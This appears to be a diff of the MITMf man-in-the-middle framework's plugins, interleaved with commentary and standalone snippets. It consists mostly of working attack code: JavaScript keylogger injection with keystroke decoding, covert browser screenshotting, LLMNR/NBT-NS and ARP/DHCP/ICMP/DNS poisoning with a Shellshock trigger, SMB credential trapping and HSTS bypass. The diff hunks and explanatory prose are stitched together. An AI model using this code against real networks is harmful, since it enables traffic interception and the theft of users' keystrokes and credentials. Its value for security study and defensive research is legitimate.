+       group.add_argument("--white-ips", metavar='IP', default='', type=str, help="Inject content ONLY for these ips (comma seperated)")
+       group.add_argument("--black-ips", metavar='IP', default='', type=str, help="DO NOT inject content for these ips (comma seperated)")
+       group.add_argument("--white-domains", metavar='DOMAINS', default='', type=str, help="Inject content ONLY for these domains (comma seperated)")
+       group.add_argument("--black-domains", metavar='DOMAINS', default='', type=str, help="DO NOT inject content for these domains (comma seperated)")
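The injection step itself is a string substitution before the configured marker (</body> by default). A rough standalone illustration of that step, assuming a payload string has already been assembled the way get_payload() builds one:

import re

def inject_before(html, payload, match_str='</body>'):
    # Place the payload immediately before the first occurrence of match_str (case-insensitive).
    return re.sub(re.escape(match_str), payload + match_str, html, count=1, flags=re.IGNORECASE)

print(inject_before('<html><body>hi</body></html>',
                    '<script src="http://example.com/x.js"></script>'))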
@@ -1,71 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import random
import string

from plugins.plugin import Plugin
from plugins.Inject import Inject

mitmf_logger = logging.getLogger("mitmf")

class jskeylogger(Inject, Plugin):
    name     = "JSKeylogger"
    optname  = "jskeylogger"
    desc     = "Injects a javascript keylogger into clients webpages"
    version  = "0.2"
    has_opts = False

    def initialize(self, options):
        Inject.initialize(self, options)
        self.html_payload = self.msf_keylogger()

    def clientRequest(self, request):
        if 'keylog' in request.uri:
            request.printPostData = False

            raw_keys = request.postData.split("&&")[0]
            input_field = request.postData.split("&&")[1]

            keys = raw_keys.split(",")
            if keys:
                del keys[0]; del(keys[len(keys)-1])

                nice = ''
                for n in keys:
                    if n == '9':
                        nice += "<TAB>"
                    elif n == '8':
                        nice = nice[:-1]
                    elif n == '13':
                        nice = ''
                    else:
                        try:
                            nice += n.decode('hex')
                        except:
                            mitmf_logger.error("{} [JSKeylogger] Error decoding char: {}".format(request.client.getClientIP(), n))

                mitmf_logger.info("{} [JSKeylogger] Host: {} | Field: {} | Keys: {}".format(request.client.getClientIP(), request.headers['host'], input_field, nice))

    def msf_keylogger(self):
        keylogger = open("./core/javascript/msfkeylogger.js", "r").read()

        return '<script type="text/javascript">\n' + keylogger + '\n</script>'
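The injected script reports keystrokes as comma-separated hex character codes, which clientRequest() turns back into text (with 9, 8 and 13 handled as tab, backspace and enter). The same decoding as a plain function, outside the proxy; binascii.unhexlify is the portable spelling of the str.decode('hex') call used above:

import binascii

def decode_keys(raw_keys):
    nice = ''
    for n in raw_keys.split(','):
        if n == '9':
            nice += '<TAB>'
        elif n == '8':
            nice = nice[:-1]              # backspace drops the last character
        elif n == '13':
            nice = ''                     # enter resets the buffer, as in the plugin
        else:
            nice += binascii.unhexlify(n).decode('latin-1')
    return nice

print(decode_keys('68,65,6c,6c,6f'))      # -> 'hello'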
@@ -1,80 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

"""

Plugin by @rubenthijssen

"""

import sys
import logging
import time
import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
from core.sergioproxy.ProxyPlugins import ProxyPlugins

mitmf_logger = logging.getLogger("mitmf")

class Replace(Plugin):
    name     = "Replace"
    optname  = "replace"
    desc     = "Replace arbitrary content in HTML content"
    version  = "0.2"
    has_opts = False

    def initialize(self, options):
        self.options = options

        self.ctable = {}
        self.dtable = {}
        self.mime = "text/html"

    def serverResponse(self, response, request, data):
        ip, hn, mime = self._get_req_info(response)

        if self._should_replace(ip, hn, mime):

            # Did the user provide us with a regex file?
            for rulename, regexs in self.config['Replace'].iteritems():
                for regex1,regex2 in regexs.iteritems():
                    if re.search(regex1, data):
                        try:
                            data = re.sub(regex1, regex2, data)

                            mitmf_logger.info("{} [{}] Host: {} Occurances matching '{}' replaced with '{}' according to rule '{}'".format(ip, self.name, hn, regex1, regex2, rulename))
                        except Exception:
                            mitmf_logger.error("{} [{}] Your provided regex ({}) or replace value ({}) is empty or invalid. Please debug your provided regex(es) in rule '{}'" % (ip, hn, regex1, regex2, rulename))

            self.ctable[ip] = time.time()
            self.dtable[ip+hn] = True

        return {'response': response, 'request': request, 'data': data}

    def _should_replace(self, ip, hn, mime):
        return mime.find(self.mime) != -1

    def _get_req_info(self, response):
        ip = response.getClientIP()
        hn = response.getRequestHostname()
        mime = response.headers['Content-Type']

        return (ip, hn, mime)
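The plugin is driven entirely by the [Replace] section of the config file: each rule maps a search regex to a replacement, applied to every HTML response. A small standalone sketch of that inner loop, with a plain dict standing in for self.config['Replace'] (the rule name and patterns here are made up for illustration):

import re

rules = {   # hypothetical stand-in for self.config['Replace']
    'example-rule': {r'Internet Explorer': 'Netscape Navigator'},
}

def apply_rules(data, rules):
    # Mirror the nested rule/regex iteration used by serverResponse()
    for rulename, regexs in rules.items():
        for pattern, replacement in regexs.items():
            if re.search(pattern, data):
                data = re.sub(pattern, replacement, data)
    return data

print(apply_rules('Best viewed in Internet Explorer', rules))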
@@ -1,128 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from plugins.plugin import Plugin
from twisted.internet import reactor
from core.utils import SystemConfig, shutdown

from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
from core.responder.wpad.WPADPoisoner import WPADPoisoner

class Responder(Plugin):
    name      = "Responder"
    optname   = "responder"
    desc      = "Poison LLMNR, NBT-NS and MDNS requests"
    tree_info = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"]
    version   = "0.2"
    has_opts  = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.interface = options.interface
        self.ourip = SystemConfig.getIP(options.interface)

        try:
            config = self.config['Responder']
            smbChal = self.config['MITMf']['SMB']['Challenge']
        except Exception as e:
            shutdown('[-] Error parsing config for Responder: ' + str(e))

        LANFingerprinter().start(options)
        MDNSPoisoner().start(options, self.ourip)
        NBTNSPoisoner().start(options, self.ourip)
        LLMNRPoisoner().start(options, self.ourip)

        if options.wpad:
            from core.responder.wpad.WPADPoisoner import WPADPoisoner
            WPADPoisoner().start(options)

        if self.config["Responder"]["MSSQL"].lower() == "on":
            from core.responder.mssql.MSSQLServer import MSSQLServer
            MSSQLServer().start(smbChal)

        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.responder.kerberos.KERBServer import KERBServer
            KERBServer().start()

        if self.config["Responder"]["FTP"].lower() == "on":
            from core.responder.ftp.FTPServer import FTPServer
            FTPServer().start()

        if self.config["Responder"]["POP"].lower() == "on":
            from core.responder.pop3.POP3Server import POP3Server
            POP3Server().start()

        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.responder.smtp.SMTPServer import SMTPServer
            SMTPServer().start()

        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.responder.imap.IMAPServer import IMAPServer
            IMAPServer().start()

        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.responder.ldap.LDAPServer import LDAPServer
            LDAPServer().start(smbChal)

        if options.analyze:
            self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
            self.IsICMPRedirectPlausible(self.ourip)

    def IsICMPRedirectPlausible(self, IP):
        result = []
        dnsip = []
        for line in file('/etc/resolv.conf', 'r'):
            ip = line.split()
            if len(ip) < 2:
                continue
            if ip[0] == 'nameserver':
                dnsip.extend(ip[1:])

        for x in dnsip:
            if x !="127.0.0.1" and self.IsOnTheSameSubnet(x,IP) == False:
                self.tree_info.append("You can ICMP Redirect on this network. This workstation ({}) is not on the same subnet than the DNS server ({})".format(IP, x))
            else:
                pass

    def IsOnTheSameSubnet(self, ip, net):
        net = net+'/24'
        ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
        netstr, bits = net.split('/')
        netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
        mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
        return (ipaddr & mask) == (netaddr & mask)

    def pluginReactor(self, strippingFactory):
        reactor.listenTCP(3141, strippingFactory)

    def pluginOptions(self, options):
        options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
        options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries")
        options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries")
        options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query")
        options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
        options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server")
        # Removed these options until I find a better way of implementing them
        #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
        #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
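IsOnTheSameSubnet() above hand-rolls the netmask arithmetic and assumes a /24. For comparison, a sketch of the same check using the ipaddress module (standard library in Python 3; available to Python 2.7 as the ipaddress backport) rather than manual bit masking:

import ipaddress

def same_subnet(ip, net, prefix=24):
    # True if ip falls inside net's /prefix network (the plugin assumes /24).
    network = ipaddress.ip_network(u'{}/{}'.format(net, prefix), strict=False)
    return ipaddress.ip_address(u'{}'.format(ip)) in network

print(same_subnet('192.168.1.50', '192.168.1.1'))   # True
print(same_subnet('8.8.8.8', '192.168.1.1'))        # False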
@@ -1,24 +0,0 @@
import logging
import random
import string
from plugins.plugin import Plugin
from core.utils import SystemConfig

mitmf_logger = logging.getLogger("mitmf")

class SMBTrap(Plugin):
    name     = "SMBTrap"
    optname  = "smbtrap"
    desc     = "Exploits the SMBTrap vulnerability on connected clients"
    version  = "1.0"
    has_opts = False

    def initialize(self, options):
        self.ourip = SystemConfig.getIP(options.interface)

    def serverResponseStatus(self, request, version, code, message):
        return {"request": request, "version": version, "code": 302, "message": "Found"}

    def serverHeaders(self, response, request):
        mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host']))
        response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))
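Put together, the two hooks turn every intercepted response into a 302 whose Location is a file:// UNC path on the attacker's host, which Windows clients will try to open over SMB. A small sketch of the response the trapped client ends up receiving (layout is illustrative; the plugin sets the header through the proxy rather than building raw HTTP):

import random
import string

def trap_response(our_ip):
    # 302 redirect to a file:// path with a random 8-character share name,
    # matching how the plugin fills in the Location header.
    share = ''.join(random.sample(string.ascii_uppercase + string.digits, 8))
    return "HTTP/1.1 302 Found\r\nLocation: file://{}/{}\r\n\r\n".format(our_ip, share)

print(trap_response('192.168.1.10'))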
@@ -1,51 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import sys
import logging

from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef
from core.utils import IpTables

class HSTSbypass(Plugin):
    name      = 'SSLstrip+'
    optname   = 'hsts'
    desc      = 'Enables SSLstrip+ for partial HSTS bypass'
    version   = "0.4"
    tree_info = ["SSLstrip+ by Leonardo Nve running"]
    has_opts  = False

    def initialize(self, options):
        self.options = options
        self.manualiptables = options.manualiptables

        if not options.manualiptables:
            if IpTables.getInstance().dns is False:
                IpTables.getInstance().DNS(self.config['MITMf']['DNS']['port'])

        URLMonitor.getInstance().setHstsBypass()
        DNSChef.getInstance().setHstsBypass()

    def finish(self):
        if not self.manualiptables:
            if IpTables.getInstance().dns is True:
                IpTables.getInstance().Flush()
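The plugin itself only flips the HSTS-bypass switches on URLMonitor and DNSChef and asks the IpTables helper to divert DNS. On Linux that diversion generally amounts to a NAT REDIRECT rule; a hedged sketch of the equivalent raw command is below (this is an assumption about what the helper does, not code taken from MITMf's IpTables class, and the exact rule it issues may differ):

import subprocess

def redirect_dns_to_local_port(port=53):
    # Divert inbound UDP/53 to the local DNS proxy port via iptables NAT.
    subprocess.check_call([
        'iptables', '-t', 'nat', '-A', 'PREROUTING',
        '-p', 'udp', '--dport', '53',
        '-j', 'REDIRECT', '--to-port', str(port)
    ])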
@@ -1,63 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
import base64
import urllib
import re

from datetime import datetime
from plugins.Inject import Inject
from plugins.plugin import Plugin

mitmf_logger = logging.getLogger('mitmf')

class ScreenShotter(Inject, Plugin):
    name     = 'ScreenShotter'
    optname  = 'screen'
    desc     = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser'
    ver      = '0.1'
    has_opts = True

    def initialize(self, options):
        self.interval = 10 or options.interval
        Inject.initialize(self, options)
        self.html_payload = self.get_payload()

    def clientRequest(self, request):
        if 'saveshot' in request.uri:
            request.printPostData = False
            client = request.client.getClientIP()
            img_file = '{}-{}-{}.png'.format(client, request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))
            try:
                with open('./logs/' + img_file, 'wb') as img:
                    img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1]))
                    img.close()

                mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(client, img_file))
            except Exception as e:
                mitmf_logger.error('{} [ScreenShotter] Error saving screenshot: {}'.format(client, e))

    def get_payload(self):
        canvas = re.sub("SECONDS_GO_HERE", str(self.interval*1000), open("./core/javascript/screenshot.js", "rb").read())
        return '<script type="text/javascript">' + canvas + '</script>'

    def pluginOptions(self, options):
        options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=None, help="Interval at which screenshots will be taken (default 10 seconds)")
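The POST body produced by the injected canvas script is a URL-encoded data URL (data:image/png;base64,...); clientRequest() strips everything before the comma and base64-decodes the rest. That decoding step in isolation, with a tiny sample payload:

import base64
try:
    from urllib import unquote          # Python 2, as used by the plugin
except ImportError:
    from urllib.parse import unquote    # Python 3

def data_url_to_png(post_data):
    # post_data arrives URL-encoded, e.g. 'data%3Aimage%2Fpng%3Bbase64%2CiVBORw0K...'
    return base64.b64decode(unquote(post_data).split(',')[1])

png_bytes = data_url_to_png('data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgo%3D')
print(len(png_bytes))                   # 8 bytes: the PNG magic number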
plugins/Spoof.py
@@ -1,132 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from core.utils import SystemConfig, IpTables, shutdown
from core.poisoners.arp.ARPpoisoner import ARPpoisoner
from core.poisoners.arp.ARPWatch import ARPWatch
from core.servers.dns.DNSchef import DNSChef
from core.poisoners.dhcp.DHCPpoisoner import DHCPpoisoner
from core.poisoners.icmp.ICMPpoisoner import ICMPpoisoner
from plugins.plugin import Plugin
from scapy.all import *

class Spoof(Plugin):
    name     = "Spoof"
    optname  = "spoof"
    desc     = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
    version  = "0.6"
    has_opts = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.dnscfg = self.config['MITMf']['DNS']
        self.dhcpcfg = self.config['Spoof']['DHCP']
        self.targets = options.targets
        self.arpmode = options.arpmode or 'rep'
        self.manualiptables = options.manualiptables
        self.mymac = SystemConfig.getMAC(options.interface)
        self.myip = SystemConfig.getIP(options.interface)
        self.protocolInstances = []

        #Makes scapy more verbose
        debug = False

        if options.arp:

            if not options.gateway:
                shutdown("[-] --arp argument requires --gateway")

            if options.targets is None:
                #if were poisoning whole subnet, start ARP-Watch
                arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
                arpwatch.debug = debug

                self.tree_info.append("ARPWatch online")
                self.protocolInstances.append(arpwatch)

            arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
            arp.arpmode = self.arpmode
            arp.debug = debug

            self.protocolInstances.append(arp)


        elif options.icmp:

            if not options.gateway:
                shutdown("[-] --icmp argument requires --gateway")

            if not options.targets:
                shutdown("[-] --icmp argument requires --targets")

            icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, self.myip)
            icmp.debug = debug

            self.protocolInstances.append(icmp)

        elif options.dhcp:

            if options.targets:
                shutdown("[-] --targets argument invalid when DCHP spoofing")

            dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip, self.mymac)
            dhcp.shellshock = options.shellshock
            dhcp.debug = debug
            self.protocolInstances.append(dhcp)

        if options.dns:

            if not options.manualiptables:
                if IpTables.getInstance().dns is False:
                    IpTables.getInstance().DNS(self.dnscfg['port'])

        if not options.arp and not options.icmp and not options.dhcp and not options.dns:
            shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")

        SystemConfig.setIpForwarding(1)

        if not options.manualiptables:
            if IpTables.getInstance().http is False:
                IpTables.getInstance().HTTP(options.listen)

        for protocol in self.protocolInstances:
            protocol.start()

    def pluginOptions(self, options):
        group = options.add_mutually_exclusive_group(required=False)
        group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
        group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
        group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
        options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
        options.add_argument('--arpmode',type=str, dest='arpmode', default=None, choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')

    def finish(self):
        for protocol in self.protocolInstances:
            if hasattr(protocol, 'stop'):
                protocol.stop()

        if not self.manualiptables:
            IpTables.getInstance().Flush()

        SystemConfig.setIpForwarding(0)
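Besides wiring up the chosen poisoner, initialize() enables kernel IP forwarding so intercepted traffic keeps flowing, and finish() turns it back off. SystemConfig.setIpForwarding() presumably wraps the usual Linux sysctl switch; the underlying operation is just:

def set_ip_forwarding(value):
    # Toggle Linux IPv4 forwarding -- what SystemConfig.setIpForwarding is assumed to wrap.
    with open('/proc/sys/net/ipv4/ip_forward', 'w') as f:
        f.write('{}\n'.format(value))

set_ip_forwarding(1)   # enable while spoofing
set_ip_forwarding(0)   # restore on shutdown, as finish() does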
@@ -1,69 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
from cStringIO import StringIO
from plugins.plugin import Plugin
from PIL import Image, ImageFile

mitmf_logger = logging.getLogger("mitmf")

class Upsidedownternet(Plugin):
    name     = "Upsidedownternet"
    optname  = "upsidedownternet"
    desc     = 'Flips images 180 degrees'
    version  = "0.1"
    has_opts = False

    def initialize(self, options):
        globals()['Image'] = Image
        globals()['ImageFile'] = ImageFile
        self.options = options

    def serverHeaders(self, response, request):
        '''Kill the image skipping that's in place for speed reasons'''
        if request.isImageRequest:
            request.isImageRequest = False
            request.isImage = True
            self.imageType = response.headers['content-type'].split('/')[1].upper()

    def serverResponse(self, response, request, data):
        try:
            isImage = getattr(request, 'isImage')
        except AttributeError:
            isImage = False

        if isImage:
            try:
                #For some reason more images get parsed using the parser
                #rather than a file...PIL still needs some work I guess
                p = ImageFile.Parser()
                p.feed(data)
                im = p.close()
                im = im.transpose(Image.ROTATE_180)
                output = StringIO()
                im.save(output, format=self.imageType)
                data = output.getvalue()
                output.close()
                mitmf_logger.info("{} [Upsidedownternet] Flipped image".format(response.getClientIP()))
            except Exception as e:
                mitmf_logger.info("{} [Upsidedownternet] Error: {}".format(response.getClientIP(), e))

        return {'response': response, 'request': request, 'data': data}
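The flip itself is ordinary PIL/Pillow usage: feed the response bytes to an incremental parser, rotate, and re-encode in the original format. A trimmed-down version of that transform on its own (io.BytesIO used in place of the Python 2 cStringIO shown above):

from io import BytesIO
from PIL import Image, ImageFile

def flip_image(data, image_type):
    # Parse raw response bytes, rotate 180 degrees, re-encode as the same format (e.g. 'PNG').
    parser = ImageFile.Parser()
    parser.feed(data)
    im = parser.close().transpose(Image.ROTATE_180)
    out = BytesIO()
    im.save(out, format=image_type)
    return out.getvalue()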
@@ -1,5 +1,3 @@
-#Hack grabbed from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
-#Has to be a cleaner way to do this, but it works for now
 import os
 import glob
 __all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]
@@ -1,25 +1,52 @@
-'''
-The base plugin class. This shows the various methods that
-can get called during the MITM attack.
-'''
-from core.configwatcher import ConfigWatcher
-import logging
-
-mitmf_logger = logging.getLogger('mitmf')
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import argparse
+
+from core.configwatcher import ConfigWatcher
+from core.logger import logger
 
 class Plugin(ConfigWatcher, object):
     name = "Generic plugin"
     optname = "generic"
-    tree_info = list()
+    tree_info = []
     desc = ""
     version = "0.0"
-    has_opts = False
+
+    def __init__(self, parser):
+        '''Passed the options namespace'''
+        if self.desc:
+            sgroup = parser.add_argument_group(self.name, self.desc)
+        else:
+            sgroup = parser.add_argument_group(self.name,"Options for the '{}' plugin".format(self.name))
+
+        sgroup.add_argument("--{}".format(self.optname), action="store_true",help="Load plugin '{}'".format(self.name))
+
+        self.options(sgroup)
 
     def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
 
-    def clientRequest(self, request):
+    def request(self, request):
        '''
        Handles all outgoing requests, hooks connectionMade()
        request object has the following attributes:
@@ -32,32 +59,43 @@ class Plugin(ConfigWatcher, object):
        '''
        pass
 
-    def serverHeaders(self, response, request):
+    def responseheaders(self, response, request):
        '''
        Handles all response headers, hooks handleEndHeaders()
        '''
        pass
 
-    def serverResponseStatus(self, request, version, code, message):
+    def responsestatus(self, request, version, code, message):
        '''
        Handles server response HTTP version, code and message
        '''
        return {"request": request, "version": version, "code": code, "message": message}
 
-    def serverResponse(self, response, request, data):
+    def response(self, response, request, data):
        '''
        Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
        '''
        return {'response': response, 'request':request, 'data': data}
 
-    def pluginOptions(self, options):
+    def on_config_change(self):
+        """Do something when MITMf detects the config file has been modified"""
+        pass
+
+    def options(self, options):
        '''Add your options to the options parser'''
        pass
 
-    def pluginReactor(self, strippingFactory):
+    def reactor(self, strippingFactory):
-       '''This sets up another instance of the reactor on a diffrent port, passed the default factory'''
+       '''This makes it possible to set up another instance of the reactor on a diffrent port, passed the default factory'''
        pass
 
-    def finish(self):
+    def setup_logger(self):
+        formatter = logging.Formatter("%(asctime)s [{}] %(message)s".format(self.name), datefmt="%Y-%m-%d %H:%M:%S")
+        self.log = logger().setup_logger(self.name, formatter)
+
+        formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] [{}] %(message)s".format(self.name), datefmt="%Y-%m-%d %H:%M:%S")
+        self.clientlog = logger().setup_logger("{}_{}".format(self.name, "clientlog"), formatter)
+
+    def on_shutdown(self):
        '''This will be called when shutting down'''
        pass
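Taken together with the revamped logging, the refactored base class means a minimal plugin now overrides the lower-case hook names (request, response, responseheaders, responsestatus, options, on_config_change, on_shutdown) and gets self.log / self.clientlog from setup_logger(). A sketch of the smallest plugin written against this interface; the hook signatures come from the diff above, the body is illustrative, and it assumes the framework calls setup_logger() before dispatching hooks:

from plugins.plugin import Plugin

class HelloWorld(Plugin):
    name    = "HelloWorld"
    optname = "helloworld"
    desc    = "Logs every response it sees"
    version = "0.1"

    def initialize(self, options):
        self.options = options

    def response(self, response, request, data):
        # self.log is created by Plugin.setup_logger() in the refactored base class
        self.log.info("Saw a response for {}".format(request.headers['host']))
        return {'response': response, 'request': request, 'data': data}

    def options(self, options):
        # --hello-extra is a hypothetical option, shown only to illustrate the hook
        options.add_argument('--hello-extra', type=str, help='Example option (hypothetical)')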